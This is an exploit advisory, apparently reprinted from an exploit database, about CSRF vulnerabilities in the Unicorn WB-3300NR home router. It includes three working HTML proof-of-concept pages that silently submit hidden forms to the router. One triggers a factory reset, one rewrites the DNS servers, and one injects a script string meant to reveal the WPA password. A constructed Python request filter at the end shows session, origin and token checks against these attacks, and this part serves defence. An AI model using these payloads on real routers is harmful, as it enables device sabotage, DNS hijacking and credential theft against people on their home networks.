Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)

01 Jul 2014 00:00:00 · Reported by RootType · seebug (www.seebug.org)

Unicorn Router WB-3300NR CSRF Vulnerabilities with Factory Reset and DNS Change

Code

# Exploit Title:     Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)
# Exploit Author:    absane
# Blog:              http://blog.noobroot.com
# Discovery date:    October 29th 2013   
# Vendor Homepage:   http://www.eunicorn.co.kr/kimsboard7/_product.php?inc=wb-3300nr    
# Tested on:         Unicorn WB-3300NR v1.0
# Firmware Version:  V5.07.18_ko_UIS02       

***************
*Vulnerability*
***************
The Unicorn WB-3300NR router suffers from numerous CSRF vulnerabilities.
Because the administrative pages do not require authentication by default, any state-changing request can be submitted on a victim's behalf from a page they visit, so countless exploits exist.

******************
*Proof of Concept*
******************

1) Factory Reset

<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/SysToolRestoreSet" method="post" target="cantseeme">
<input type="hidden" name="CMD" value='SYS_CONF'>
<input type="hidden" name="GO" value='system_reboot.asp'>
<input type="hidden" name="CCMD" value='0'>
</form>
<script>document.csrf_form.submit();</script>
</body></html>


2) Alter the DNS Settings

<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/AdvSetDns" method="post" target="cantseeme">
<input type="hidden" name="GO" value='wan_dns.asp'>
<input type="hidden" name="rebootTag" value=''>
<input type="hidden" name="DSEN" value='1'>
<input type="hidden" name="DNSEN" value='on'>
<input type="hidden" name="DS1" value='8.8.4.4'>
<input type="hidden" name="DS2" value='8.8.8.8'>
</form>
<script>document.csrf_form.submit();</script>
</body></html>


3) WPA Password Disclosure (possibility)(not proven)

The following PoC code only demonstrates that with CSRF and XSS, it might be possible to obtain the WPA password.
However, I have been unable to do so without forcing the router to revert to factory defaults.

<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/WizardHandle" method="post" target="cantseeme">
<input type="hidden" name="MACC" value='"; var x = ""; function y() {alert(def_wirelesspassword);} x = window.setTimeout(y,2000);//'>
</form>
<script>document.csrf_form.submit();</script>
</body></html>
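The server-side checks these three forms succeed in the absence of, shown as an added illustration that is not part of the advisory or the vendor's firmware: a request filter that requires an authenticated session, a same-origin Origin/Referer header and a per-session token before honouring a POST to any of the goform endpoints named above. The router address and endpoint list come from the PoCs; the HMAC token scheme, the secret, the session id and the third-party origin used in the constructed sample requests are assumptions.

```python
import hmac
import hashlib
from urllib.parse import urlsplit

# The router's own origin (the address the PoC forms post to) and the
# state-changing endpoints named in the advisory.
ROUTER_ORIGIN = "http://192.168.123.254"
PROTECTED = {"/goform/SysToolRestoreSet", "/goform/AdvSetDns", "/goform/WizardHandle"}


def make_csrf_token(secret: bytes, session_id: str) -> str:
    """Per-session anti-CSRF token: HMAC-SHA256 of the session id (constructed scheme)."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def is_request_allowed(method, path, headers, form, session_id, secret):
    """Return (allowed, reason). Applies the three checks the WB-3300NR lacks:
    an authenticated session, a same-origin source, and a token a third-party page cannot know."""
    if method != "POST" or path not in PROTECTED:
        return True, "not a protected state change"
    if not session_id:
        return False, "no authenticated session"
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "missing Origin/Referer"
    p = urlsplit(source)  # "null" or a foreign site both fail the comparison below
    if f"{p.scheme}://{p.netloc}" != ROUTER_ORIGIN:
        return False, f"cross-site source {source}"
    if not hmac.compare_digest(make_csrf_token(secret, session_id), form.get("csrf_token", "")):
        return False, "bad or missing csrf token"
    return True, "ok"


def demo():
    """Constructed requests: the factory-reset PoC from a third-party page, then a legitimate one."""
    secret = b"constructed-router-secret"   # placeholder, not a real device value
    sess = "sess-1234"                      # placeholder session id
    reset = {"CMD": "SYS_CONF", "GO": "system_reboot.asp", "CCMD": "0"}  # fields from PoC 1
    results = {}
    # PoC 1 submitted from a third-party page (origin is a placeholder)
    results["csrf"] = is_request_allowed("POST", "/goform/SysToolRestoreSet",
                                         {"Origin": "http://third-party.invalid"}, reset, sess, secret)
    # Same request with no session at all (the router's unauthenticated default)
    results["anon"] = is_request_allowed("POST", "/goform/SysToolRestoreSet",
                                         {"Origin": ROUTER_ORIGIN}, reset, None, secret)
    # Legitimate submission from the router's own UI carrying the token
    ok_form = dict(reset, csrf_token=make_csrf_token(secret, sess))
    results["legit"] = is_request_allowed("POST", "/goform/SysToolRestoreSet",
                                          {"Origin": ROUTER_ORIGIN}, ok_form, sess, secret)
    return results
```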
